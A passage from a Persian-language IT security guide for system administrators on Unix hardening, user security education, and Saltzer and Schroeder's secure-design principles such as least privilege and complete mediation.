‫ﺑﺘﻮﺍﻧﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ﺷﺒﻜﻪ ﻭ ﻛﺎﻣﭙﺎﻳﻠﺮ ‪ C‬ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺗﺮﺗﻴﺐ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ‪ ،‬ﻛﺎﺭﺑﺮﺍﻥ ﻧﺒﺎﻳﺪ ﺑﺘﻮﺍﻧﻨﺪ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ ﻛـﻪ‬
‫ﺁﺯﻣﺎﻳﺶ ﻧﺸﺪﻩ ﻭ ﺗﻮﺳﻂ ﻳﻚ ﻓﺮﺩ ﺩﻭﺭﻩﺩﻳﺪﻩ ﻭ ﻣﺠﺎﺯ ﺗﺄﻳﻴﺪ ﻧﺸﺪﻩ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ‪.‬‬
‫ﺭﺍﻫﺒﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﻛﺎﺭﺑﺮﺩ ﺑﺮﺧﻲ ﺍﺯ ﺍﺻﻮﻝ ﻛﻠﻲ ﺍﻣﻨﻴﺖ ﺩﺭ ﺣﺪ ﻣﻌﻘﻮﻝ‪ ،‬ﺿﺮﻳﺐ ﺍﻣﻨﻴﺖ ﺭﺍ ﺑﺎﻻ ﺑﺒﺮﻧـﺪ‪ .‬ﺑـﺮﺍﻱ ﻧﻤﻮﻧـﻪ ﺑﺠـﺎﻱ ﺣـﺬﻑ ﻫﻤـﺔ‬
‫ﻛﺎﻣﭙﺎﻳﻠﺮﻫﺎ ﻭ ﻛﺘﺎﺑﺨﺎﻧﻪﻫﺎ ﺍﺯ ﻫﺮ ﺩﺳﺘﮕﺎﻩ‪ ،‬ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﮕﻮﻧﻪﺍﻱ ﻣﺤﺎﻓﻈﺖ ﺷﻮﻧﺪ ﻛﻪ ﻓﻘﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻋﻀﻮ ﺩﺭ ﻳـﻚ ﮔـﺮﻭﻩ ﻛـﺎﺭﺑﺮﻱ‬
‫ﺧﺎﺹ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ .‬ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ ﺍﻳﻨﮕﻮﻧﻪ ﺩﺳﺘﺮﺳﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﺴﺎﻧﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺁﻧﻬـﺎ ﺍﻋﺘﻤـﺎﺩ ﻛـﺮﺩ‬
‫ﻛﻪ ﺩﻗﺘﻬﺎﻱ ﻻﺯﻡ ﺭﺍ ﺍﻋﻤﺎﻝ ﻛﻨﻨﺪ‪ ،‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻦ ﮔﺮﻭﻩ ﻛﺎﺭﺑﺮﻱ ﺍﻓﺰﻭﺩﻩ ﺷﻮﻧﺪ‪ .‬ﺭﻭﺷﻬﺎﻱ ﻣﺸﺎﺑﻬﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺮﺍﻱ ﺳﺎﻳﺮ ﺭﺩﻩﻫـﺎﻱ ﺍﺑـﺰﺍﺭ‬
‫ﻧﻴﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻮﺩ‪ ،‬ﻣﺎﻧﻨﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻛﻨﺘﺮﻝ ﺷﺒﻜﻪ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺧﺒﺎﺭ ‪ .Usenet‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﺗﻐﻴﻴﺮ ﺩﻳﺪﮔﺎﻩ ﺳﻨﺘﻲ ﺑﻪ "ﺩﺍﺩﻩ" ﺩﺭ ﻳﻚ ﺳﻴﺴﺘﻢ‬
‫)ﺍﺯ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻏﻴﺮ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ( ﻣﻲﺗﻮﺍﻧﺪ ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ .‬ﺑـﺮﺍﻱ ﻣﺜـﺎﻝ ﻓﺎﻳﻠﻬـﺎ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺠﺎﻱ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﺑﻮﺩﻥ ﺑﺮﺍﻱ ﻫﻤﻪ‪ ،‬ﺩﺭ ﺣﺎﻟﺖ ﭘﻴﺶﻓﺮﺽ ﺑﺎﻳﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺧﻮﺍﻧﺪﻥ ﻣﺤﺎﻓﻈﺖ ﺷـﻮﻧﺪ‪ .‬ﺗﻨﻈـﻴﻢ ﺻـﺤﻴﺢ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ‪ ،‬ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺳﺎﻳﻪﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‪ ٢٨‬ﺩﻭ ﻣﺜﺎﻝ ﻫﺴﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﭼﮕﻮﻧﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﺳﺎﺩﻩ‬
‫ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴﺴﺘﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻣﻨﻴﺖ ﺭﺍ ﺩﺭ ﺗﻤﺎﻡ ‪ Unix‬ﺑﻬﺒﻮﺩ ﺑﺨﺸﺪ‪.‬‬
‫ﺣﻴﺎﺗﻲﺗﺮﻳﻦ ﻭﺟﻪ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴﺖ ‪ Unix‬ﻭﺍﺩﺍﺭ ﻛﺮﺩﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺍﻧﺘﻈﺎﺭﺍﺕ ﺍﺳﺖ‪ .‬ﺑﺪﻳﻬﻲ ﺍﺳﺖ ﺍﮔﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺑـﻪ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺷﺨﺼﻲ ﻗﺒﻞ ﺍﺯ ‪ Microsoft Windwos NT‬ﻋﺎﺩﺕ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻓﺰﺍﻳﺶ ﺍﻣﻨﻴـﺖ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬
‫ﻣﺒﺘﻨﻲ ﺑﺮ ‪ NT‬ﻧﻴﺰ ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪ .‬ﺭﺍﻩ ﺭﺳﻴﺪﻥ ﺑﻪ ﺍﻳﻦ ﻫﺪﻑ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺗﺤـﺼﻴﻼﺕ‪ ،‬ﺁﮔـﺎﻫﻲ‪ ،‬ﻭ ﺍﻳﺠـﺎﺩ ﺍﻧﮕﻴـﺰﻩ ﺍﺳـﺖ‪.‬‬
‫ﻣﻌﻴﺎﺭﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴﺖ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﻫﺴﺘﻨﺪ‪ ،‬ﻭﻟﻲ ﺗﺠﺮﺑﻪ ﻛﺮﺍﺭﹰﺍ ﻧﺸﺎﻥ ﺩﺍﺩﻩ ﻛﻪ ﻣﺸﻜﻼﺕ ﻓﺮﺩﻱ ﺑﺎ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ﻓﻨـﺎﻭﺭﻱ ﻗﺎﺑـﻞ ﺣـﻞ‬
‫ﻧﻴﺴﺘﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﻣﺤﻴﻄﻲ ﺷﺮﻭﻉ ﻛﺮﺩﻧﺪ ﻛﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﺁﻧﭽـﻪ ﺍﻣـﺮﻭﺯﻩ ﺑـﺎ ﺁﻥ ﻣﻮﺍﺟـﻪ ﻫـﺴﺘﻨﺪ ﻛﻤﺘـﺮ‬
‫ﺗﻬﺪﻳﺪﻛﻨﻨﺪﻩ ﺑﻮﺩ‪ .‬ﺑﺎ ﺁﻣﻮﺯﺵ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺧﻄﺮﺍﺕ ﻣﻮﺟﻮﺩ ﻭ ﺍﻳﻨﻜﻪ ﻫﻤﻜﺎﺭﻱ ﺁﻧﺎﻥ ﭼﻘﺪﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻛﻨـﺪ‪،‬‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪ .‬ﺑﺎ ﺍﻳﺠﺎﺩ ﺍﻧﮕﻴﺰﺓ ﺻﺤﻴﺢ ﺩﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﺍﻱ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ﺑﺨـﺸﻲ ﺍﺯ ﻣﻜـﺎﻧﻴﺰﻡ‬
‫ﺍﻣﻨﻴﺘﻲ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺁﻣﻮﺯﺵ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﻬﺘﺮ ﺗﻨﻬﺎ ﺯﻣﺎﻧﻲ ﺧﻮﺏ ﻧﺘﻴﺠﻪ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﺑﺎ ﻫﻢ ﺍﻋﻤﺎﻝ ﺷﻮﻧﺪ‪ .‬ﺁﻣﻮﺯﺵ ﺑﺪﻭﻥ ﺍﻧﮕﻴﺰﺵ ﻣﻲﺗﻮﺍﻧـﺪ ﺑـﻪ‬
‫ﺁﻥ ﻣﻔﻬﻮﻡ ﺑﺎﺷﺪ ﻛﻪ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻋﻤﻞ ﺍﻋﻤﺎﻝ ﻧﺸﺪﻩﺍﻧﺪ ﻭ ﺍﻧﮕﻴﺰﺵ ﺑﺪﻭﻥ ﺁﻣﻮﺯﺵ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﻛﺎﺭﻫﺎﻱ‬
‫ﺑﻪ ﺍﻧﺠﺎﻡ ﺭﺳﻴﺪﻩ‪ ،‬ﺷﻜﺎﻑ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫‪Shadow Password Files‬‬
‫‪28‬‬
‫‪٢٦٥‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﺼﻞ ﺩﻭﻡ‬
‫ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﺭﺍﻫﺒﺮﺍﻥ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺍﻳﻦ ﻓﺼﻞ ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﺍﺯ ﺍﻣﻨﻴﺖ ﺑﺮﺍﻱ ﻣﺪﻳﺮﺍﻥ ﺍﺟﺮﺍﻳﻲ ﺍﺭﺍﺋﻪ ﻭ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻳﻤﻦ ﺑﺤﺚ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺗﻮﺿﻴﺢ ﻣﻲﺩﻫﺪ‬
‫ﻛﻪ ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺣﻤﻠﻪ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻣﺘﺪﺍﻭﻝ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺑﺮ ﻣﻲﺷﻤﺎﺭﺩ ﻭ ﻣﻄﺎﻟﻌﺔ ﻣﻮﺭﺩﻱ ﻳﻚ ﻧﻤﻮﻧﻪ‬
‫ﺣﻤﻠﻪ ﺭﺍ ﺷﺮﺡ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻭ ﺭﺍﻫﺒﺮﺍﻥ‬
‫ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺭﺍﻫﺒﺮ ﻓﻨﻲ‪ ،‬ﺷﻤﺎ ﻣﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﻳﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻣﺪﻳﺮﻳﺖ ﻣﻲﻛﻨﻴﺪ ﻫﻤﺎﻧﻄﻮﺭ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻛـﻪ ﺑﺎﻳـﺪ ﻛـﺎﺭ‬
‫ﻛﻨﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ﺗﻌﺎﺭﻳﻒ ﺭﺳﻤﻲ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﻳﻚ ﺗﻌﺮﻳﻒ ﻋﻤﻠﻲ ﻣﻔﻴـﺪ ﺑـﺮﺍﻱ ﺭﺍﻫﺒـﺮﺍﻥ ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻳﻨﻜـﻪ‪" :‬ﻳـﻚ‬
‫ﻛﺎﻣﭙﻴﻮﺗﺮ ﺩﺭﺻﻮﺭﺗﻲ ﺍﻳﻤﻦ ﺍﺳﺖ ﻛﻪ ﺑﺘﻮﺍﻥ ﺑﻪ ﺁﻥ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﺵ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩ ﻛﻪ ﺁﻧﻄﻮﺭ ﺭﻓﺘﺎﺭ ﻛﻨﻨﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻭﺩ"‪.‬‬
‫ﺍﮔﺮ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﻛﺮﺩﻩﺍﻳﺪ ﺗﺎ ﭼﻨﺪ ﻫﻔﺘﻪ ﺩﺭ ﺁﻥ ﺑﻤﺎﻧﺪ ﻭ ﺑﺮﺍﻱ ﻛﺴﺎﻧﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺁﻥ ﺭﺍ ﺑﺨﻮﺍﻧﻨﺪ ﻫﻤﭽﻨﺎﻥ ﻧﺎﺧﻮﺍﻧـﺪﻩ ﺑﻤﺎﻧـﺪ‪،‬‬
‫ﺁﻧﮕﺎﻩ ﺭﺍﻳﺎﻧﻪ ﺍﻳﻤﻦ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﻣﻨﻴﺖ ﻳﻚ ﻭﻇﻴﻔﺔ ﺣﺴﺎﺱ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﻧﻘﺸﻬﺎﻱ ﻳﻚ ﺭﺍﻫﺒﺮ ﺍﺳﺖ‪ .‬ﺑـﺎ ﺍﻳـﻦ ﺗﻌﺮﻳـﻒ‪ ،‬ﻓﺎﺟﻌـﻪﻫـﺎﻱ‬
‫ﻃﺒﻴﻌﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﺷﻜﺎﻝﺩﺍﺭ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﺗﻬﺪﻳﺪ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﻨﺪ‪.‬‬
‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺿﻌﻴﻒ ﻧﻮﺷﺘﻪ ﺷﺪﻩ‬
‫ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﻳﻤﻦ ﺁﺳﺎﻥ ﻧﻴﺴﺖ‪ .‬ﺩﺭ ﺳﺎﻝ ‪ ،۱۹۷۵‬ﺟﺮﻭﻡ ﺳﺎﻟﺰﺭ‪ ٢٩‬ﻭ ﺍﻡ‪ .‬ﺩﻱ‪ .‬ﺷـﺮﻭﺩﺭ‪ ،٣٠‬ﻫﻔـﺖ ﻣﻌﻴـﺎﺭ ﺑـﺮﺍﻱ‬
‫ﺑﻨﺎﻱ ﭼﻨﻴﻦ ﺳﻴﺴﺘﻤﻲ ﺗﻌﺮﻳﻒ ﻛﺮﺩﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪:‬‬
‫ﻫﺮ ﻛﺎﺭﺑﺮ ﻭ ﻓﺮﺁﻳﻨﺪﻱ ﺑﺎﻳﺪ ﺍﺯ ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻻﺯﻡ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑﺎﺷﺪ‪ .‬ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﺧﺴﺎﺭﺍﺗﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻣﻬﺎﺟﻤﻴﻦ ﺑـﺪﺧﻮﺍﻩ‬
‫ﻭ ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺗﻮﺳﻂ ﺧﻄﺎﻫﺎ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑﺠﺎﻱ ﺁﻧﻜﻪ ﺑﻄﻮﺭ ﭘﻴﺶﻓﺮﺽ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪،‬‬
‫ﺑﺎﻳﺪ ﺻﺮﺍﺣﺘﹰﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻻﺯﻡ ﺑﺎﺷﻨﺪ ﺗﺎ ﺑﻪ ﺁﻧﻬﺎ ﺍﺧﺘﺼﺎﺹ ﻳﺎﺑﻨﺪ‪.‬‬
‫ﻣﻜﺎﻧﻴﺰﻡ ﺍﻗﺘﺼﺎﺩﻱ‬
‫ﻃﺮﺍﺣﻲ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﻛﻮﭼﻚ ﻭ ﺳﺎﺩﻩ ﺑﺎﺷﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ ﻭ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻛﺮﺩ‪.‬‬
‫ﻣﻴﺎﻧﺠﻴﮕﺮﻱ ﻛﺎﻣﻞ‬
‫ﻫﺮ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺩﺍﺷﺘﻦ ﻣﺠﻮﺯ ﺻﺤﻴﺢ ﻛﻨﺘﺮﻝ ﺷﻮﺩ‪.‬‬
‫‪Jerome Saltzer‬‬
‫‪M. D. Schroder‬‬
‫‪29‬‬
‫‪30‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﺣﺪﺍﻗﻠﻲ‬
‫‪٢٦٦‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻃﺮﺍﺣﻲ ﺑﺎﺯ‬
‫‪٣١‬‬
‫ﺍﻳﻤﻨﻲ ﻧﺒﺎﻳﺪ ﺑﺮ ﺍﺳﺎﺱ ﺟﻬﻞ ﻣﻬﺎﺟﻢ ﺍﻳﺠﺎﺩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺿﺎﺑﻄﻪ ﺍﺯ ﻭﺟﻮﺩ ﺩﺭﺏ ﻣﺨﻔﻲ ﺳﻴﺴﺘﻢ ﻛﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻧﻲ ﻛﻪ ﺁﻧـﺮﺍ ﻣـﻲﺷﻨﺎﺳـﻨﺪ‬
‫ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺩﻫﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺟﺪﺍﺳﺎﺯﻱ ﺩﺳﺘﺮﺳﻴﻬﺎ‬
‫ﻫﺮﺟﺎ ﻛﻪ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺑﺎﺷﺪ‪ ،‬ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻢ ﺑﺎﻳﺪ ﺑﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷﺪﻥ ﺑﻴﺶ ﺍﺯ ﻳﻚ ﺷﺮﻁ ﺑﺴﺘﮕﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺣﺪﺍﻗﻞ ﻣﻜﺎﻧﻴﺰﻡ ﻣﺸﺘﺮﻙ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺳﻴﺴﺘﻢ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ‪ ،‬ﻫﻢ ﻛﻨﺘﺮﻝ ﻣﺨﻔﻴﺎﻧﻪ ﻭ ﻫﻢ ﺗﻼﺷﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﻏﻠﺒـﻪ ﺑـﺮ ﻣﻜﺎﻧﻴﺰﻣﻬـﺎﻱ‬
‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﭘﺬﻳﺮﺵ ﺭﻭﺍﻧﻲ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﺎﻳﺪ ﺩﺭ ﻛﺎﺭﺑﺮﺩ ﺁﺳﺎﻥ ﺑﺎﺷﻨﺪ ﺗﺎ ﺩﺭ ﻋﻤﻞ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺷﻮﺩ ﻭ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻧﺸﻮﻧﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻃﺮﺍﺣﺎﻥ ﻫﻴﭽﮕﺎﻩ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺭﺍ ﻳﺎﺩ ﻧﻤﻲﮔﻴﺮﻧﺪ‪ ،‬ﺍﮔﺮ ﻫﻢ ﻳﺎﺩ ﺑﮕﻴﺮﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺍﺯ ﻳﺎﺩ ﻣﻲﺑﺮﻧﺪ‪ ،‬ﺍﺯ ﺭﺍﻫﻬﺎﻱ ﻣﻴﺎﻧﺒﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻳﺎ‬
‫ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﻨﺪ ﻛﻪ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﺁﻧﻘﺪﺭ ﺍﻫﻤﻴﺖ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺧﻮﺩ ﺭﺍ ﺩﺭﮔﻴﺮ ﺁﻥ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠﻪ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎ‪ ،‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ‪ ،‬ﺑﺮﻧﺎﻣﻪﻫﺎﻱ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻓﺮﺍﻭﺍﻧﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻃﺮﺍﺣﻲ ﻧﺎﻗﺺ ﺩﺍﺭﻧﺪ ﻭﻟﻲ ﺩﺭ ﺳﻄﺢ ﻭﺳﻴﻌﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴﺮﻧـﺪ ﻭ ﻣـﺪﻋﻲ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺨﺸﻲ ﺍﺯ ﺯﻳﺮﺑﻨﺎﻱ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴﺴﺘﻢ ﻫﺴﺘﻨﺪ‪ .‬ﻃﺮﺍﺣﻲ ﻧﺎﻣﻨﺎﺳﺐ ﻣﻨﺠﺮ ﺑﻪ ﺑﺮﻭﺯ ﻣﺸﻜﻼﺕ ﻭ ﺁﺛﺎﺭ ﺟﺎﻧﺒﻲ ﭘﻴﺶﺑﻴﻨﻲﻧﺸﺪﻩ ﻣﻲﺷﻮﺩ‬
‫ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻮﺟﺐ ﺧﺮﺍﺑﻴﻬﺎﻱ ﺗﺼﺎﺩﻓﻲ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﻮﺩ ﻭ ﻳﺎ ﻋﺎﻣﺪﺍﻧﻪ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬـﺎﺟﻢ ﻣـﻮﺭﺩ ﺳـﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﺑﮕﻴﺮﺩ‪.‬‬
